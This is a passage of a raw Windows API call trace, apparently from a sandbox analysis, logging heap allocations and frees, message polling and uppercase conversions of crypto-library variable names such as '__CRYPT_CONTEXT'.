0x2e51010 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0226.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0226.837] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.837] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0226.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0226.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0226.837] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0226.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0226.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0226.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0226.837] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0226.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0226.838] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0226.838] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.838] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0226.839] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0226.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0226.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0226.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0226.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.841] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0226.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0226.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0226.841] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0226.841] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0226.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0226.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0226.841] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0226.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0226.843] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.843] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.843] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0226.843] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0226.843] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0226.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0226.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0226.844] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0226.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0226.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0226.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0226.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.845] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0226.845] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.845] HeapFree 